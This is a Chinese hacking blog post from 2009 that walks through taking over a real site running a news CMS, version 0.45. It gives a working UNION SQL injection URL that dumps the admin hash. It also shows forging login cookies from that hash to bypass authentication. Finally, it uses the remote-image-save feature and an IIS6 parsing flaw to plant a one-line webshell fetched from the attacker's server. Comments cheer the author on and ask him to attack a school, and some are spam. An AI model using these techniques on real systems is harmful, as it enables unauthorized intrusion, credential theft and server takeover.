RSS

沸腾新闻系统 v0.45 拿 SHELL

This entry was posted on Sep 25 2009

作者:st0p
转载请注明出处:http://www.st0p.org

注:已提醒目标站管理员补洞.

看到群里的無材发来一站,打开看了一下,很像是沸腾新闻系统,不过版本写的是V0.1,网上没找到相应的版本,发现有1.1和0.45两个版本,记得在News.asp存在注入来着,试了一下,的确可以,不过因为版本不同,所以news表的字段不同,所有语句有点不同。

经过st0p的尝试,目标站应该是0.45的,通过以下语句成功得到后台用户名和密码HASH,我是试到27个字段时成功的。。

1

http://st0p.org/News.asp?click=1&shu=20%201%20as%20NewsID,username%20as%20title,3%20as%20updatetime,passwd%20as%20click,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20admin%20%20order%20by%202%20desc%20union%20select%20top%202

boiling-news-system-v0-45-take-shell1

看到没,我们得到了用户名xcb,密码为c95ca278a74775f8,然后我们去破解MD5,郁闷,查不到,无法破解,难道无法进入后台来着。。。
然后我查看了一下0.45版的代码,发现了验证用户登陆的部分在admin/chkuser.asp中,我们看一下代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

<%
IF not(Request.cookies("KEY")="super" or Request.cookies("KEY")="check" or Request.cookies("KEY")="typemaster" or Request.cookies("KEY")="bigmaster" or Request.cookies("KEY")="smallmaster" or Request.cookies("KEY")="selfreg") THEN
'首先检测cookies中的key,如果不为上面的值,自动转向登陆页面
response.redirect "login.asp"
response.end
END IF
set urs=server.createobject("adodb.recordset")
sql="select * from admin where username='"&Request.cookies("username")&"'"
'查询cookies中username是否是管理用户
urs.open sql,conn,1,3
if urs.bof or urs.eof then
response.redirect "login.asp"
response.end
end if
IF Request.cookies("passwd")<>urs("passwd") THEN
'如果用户存在,验诈cookies中的passwd字段是否和用户的密码HASH相同,不同则转向
response.redirect "login.asp"
response.end
END IF
urs.close
set urs=nothing
%>

嘿嘿,运气还真好,虽然无法破解密码HASH,但可以利用它实现欺骗。看利用过程。。
我们用domain打开http://st0p.org/admin/index.asp,这时他会转到login.asp

boiling-news-system-v0-45-take-shell2

然后我们删掉cookies中的reglevel; fullname; purview; KEY; UserName部分,然后添加UserName=xcb; KEY=super; passwd=c95ca278a74775f8,用户名和密码自己替换,key直接用super就可以了。
我们点修改

boiling-news-system-v0-45-take-shell3

然后改网址改为http://st0p.org/admin/index.asp,点链接

boiling-news-system-v0-45-take-shell4

成功进入后台,嘿,我们直接来提权吧,这个系统有个保存远程图片的功能,我们就用他来拿SHELL了
首先,添加文章,然后在编辑器中插件图片,地址为咱们的服务器上的马,点插入,选中保存远程图片。然后提交

boiling-news-system-v0-45-take-shell5

然后我们就只需要访问添加好的文章,复制里面的图片的地址就行了。目标站的服务器是IIS6,前段不是还报了一下解析漏洞吧,正好利用一下,嘿嘿。
现在我们已经有了一句话的小马,然后该干嘛就不用我说了吧。。。
不过目标站的权限相当BT,只有上传目录可写,还不能删除。。唉,慢慢提权吧,先记录一下。。。

, , , , ,
学·武功秘籍
Chinese (Simplified) flagItalian flagKorean flagChinese (Traditional) flagPortuguese flagEnglish flagGerman flagFrench flagSpanish flagJapanese flagArabic flagRussian flagGreek flagDutch flagBulgarian flagCzech flagCroatian flagDanish flagFinnish flagHindi flagPolish flagRomanian flagSwedish flagNorwegian flagCatalan flagFilipino flagHebrew flagIndonesian flagLatvian flagLithuanian flagSerbian flagSlovak flagSlovenian flagUkrainian flagVietnamese flagAlbanian flagEstonian flagGalician flagMaltese flagThai flagTurkish flagHungarian flag


10 Responses to “沸腾新闻系统 v0.45 拿 SHELL”

  1. By Minghacker on Sep 26, 2009 | Reply

    大牛st0p~~~~膜拜


  2. By icysun on Sep 26, 2009 | Reply

    不是这个系统 ..

    尘缘雅境..

    st0p Reply:
    September 26th, 2009 at 12:21 pm

    你说的是我搞的这个?
    和0.45的沸腾新闻系统一样的,

    icysun Reply:
    September 26th, 2009 at 12:30 pm

    是的


  3. By b00lean on Sep 28, 2009 | Reply

    st0p牛 你不是日我们学校么 怎么还不去


  4. By jshfuitg on Nov 25, 2009 | Reply

    dCATec qhuvtpiheyue, [url=http://ggwyligshlfd.com/]ggwyligshlfd[/url], [link=http://nxjhtastnpxn.com/]nxjhtastnpxn[/link], http://kwxzxruczflr.com/


  5. By adkpaxv on Nov 27, 2009 | Reply

    T9v9E0 oihbhcyxrstd, [url=http://ztggdtdbkkjc.com/]ztggdtdbkkjc[/url], [link=http://haboolnldgjd.com/]haboolnldgjd[/link], http://zsjtcxcsvmjj.com/


  6. By Seengart on Dec 14, 2009 | Reply

    eh.. thank you for this thoughts :) )


  1. 2 Trackback(s)

  2. Oct 7, 2009: 尘缘雅境图文系统拿SHELL思路-IIS6 解析漏洞, 上传漏洞, 尘缘, 尘缘雅境, 沸腾, 注入, 远程保存图片, -st0p's blog
  3. Oct 7, 2009: 尘缘雅境图文系统拿SHELL思路-远程保存图片, 注入, 沸腾, 尘缘雅境, 尘缘, 上传漏洞, IIS6 解析漏洞, -lixiaopeng's blog

You must be logged in to post a comment.